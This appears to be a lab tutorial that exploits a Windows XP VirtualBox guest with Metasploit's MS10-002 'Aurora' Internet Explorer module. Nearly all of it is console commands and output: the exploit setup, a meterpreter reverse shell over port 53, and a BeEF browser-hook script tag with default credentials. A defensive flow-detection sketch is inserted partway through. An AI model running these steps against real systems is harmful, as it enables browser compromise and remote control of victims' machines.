==>>Open Windows in VirtualBox
┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
==>>Next, we enter the commands, starting with the exploit:
msf >show option
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
==>>Next, set the address the exploit server listens on:
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options
==>>Next, set the URI path:
msf exploit(ms10_002_aurora) > set URIPATH (name of the file to be sent).mp3
URIPATH => for example, smangewe.mp3
(See the highlighted part in the picture.)
==>>Then type the following commands to set the payload, LHOST and LPORT:
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.56.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH smangewe.mp3 no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
==>> Next, run the exploit:
msf exploit(ms10_002_aurora) > exploit
==>> After pressing Enter, the following appears:
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:53
[*] Using URL: http://192.168.56.1:8080/smangewe.mp3
[*] Server started.
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.56.101 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Interrupt: use the 'exit' command to quit
==>> Then copy the URL that appears above, switch to the Windows machine in VirtualBox, and open that address in Internet Explorer.
==>>Then return to the terminal and type:
msf exploit(ms10_002_aurora) > sessions -l
==>>The output then shows:
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 XPSP3\XP SP3 @ XPSP3 192.168.56.1:53 -> 192.168.56.101:1058 (192.168.56.101)
msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 - Meterpreter session 1 closed. Reason: Died
msf exploit(ms10_002_aurora) >
[*] 192.168.56.101 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (884270 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:53 -> 192.168.56.101:1032) at 2015-08-28 02:56:38 +0700
[*] 192.168.56.101 - Meterpreter session 2 closed. Reason: Died
This is the sign that the exploit we sent has worked.
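Seen from the network, the session lines above are a workstation opening a TCP connection to port 53 on a host that is not a DNS server, seconds after a connection to port 8080 on the same host, with an 884270-byte stage coming back. The following detection sketch is an added example, not part of the original post; the flow-record format, the resolver allowlist, the thresholds and the sample records are constructed assumptions.

```python
import csv
import io

# Constructed flow records (not captured traffic); addresses mirror the lab in the post.
SAMPLE_FLOWS = """ts,src,dst,proto,dport,bytes_to_src
100,192.168.56.101,192.168.56.1,tcp,8080,14200
103,192.168.56.101,192.168.56.1,tcp,53,884270
110,192.168.56.102,192.168.56.10,udp,53,180
115,192.168.56.102,192.168.56.10,tcp,53,4100
120,192.168.56.103,192.168.56.1,tcp,8080,900
"""

RESOLVERS = {"192.168.56.10"}  # assumption: the site's sanctioned DNS servers
WEB_PORTS = {80, 443}          # assumption: ports where client web traffic is expected
MAX_DNS_MSG = 65535            # largest single DNS message carried over TCP
WINDOW = 60                    # seconds allowed between the first flow and the TCP/53 flow


def find_suspect_dns_flows(flow_csv, resolvers=RESOLVERS, window=WINDOW):
    """Return one alert per TCP/53 flow that does not look like DNS."""
    flows = list(csv.DictReader(io.StringIO(flow_csv)))
    alerts = []
    for f in flows:
        if f["proto"] != "tcp" or int(f["dport"]) != 53:
            continue
        if f["dst"] in resolvers:
            continue  # TCP fallback to a sanctioned resolver is normal
        reasons = ["tcp/53 to non-resolver"]
        # Heuristic: one connection can carry several DNS messages, but a
        # workstation receiving far more than one maximum-size message is unusual.
        if int(f["bytes_to_src"]) > MAX_DNS_MSG:
            reasons.append("response larger than one DNS message")
        # Same client opened a TCP flow to the same host on a non-standard
        # port shortly before (the server in the post listens on 8080).
        for g in flows:
            dt = int(f["ts"]) - int(g["ts"])
            if ((g["src"], g["dst"]) == (f["src"], f["dst"]) and g["proto"] == "tcp"
                    and int(g["dport"]) not in WEB_PORTS | {53} and 0 <= dt <= window):
                reasons.append(f"preceded by tcp/{g['dport']} to same host")
                break
        alerts.append({"src": f["src"], "dst": f["dst"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in find_suspect_dns_flows(SAMPLE_FLOWS):
        print(a["src"], "->", a["dst"], "; ".join(a["reasons"]))
```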
Next, we continue with BeEF. Open a terminal and start BeEF by typing:
┌─[root@parrot]─[/home/budhya]
└──╼ #service beef-xss start
┌─[root@parrot]─[/home/budhya]
└──╼ #beef-xss -h
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
(process:18938): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml
We are then taken automatically to the BeEF start page.
Enter the user name and password:
user name : beef
password : beef
After that we can use BeEF for our purposes.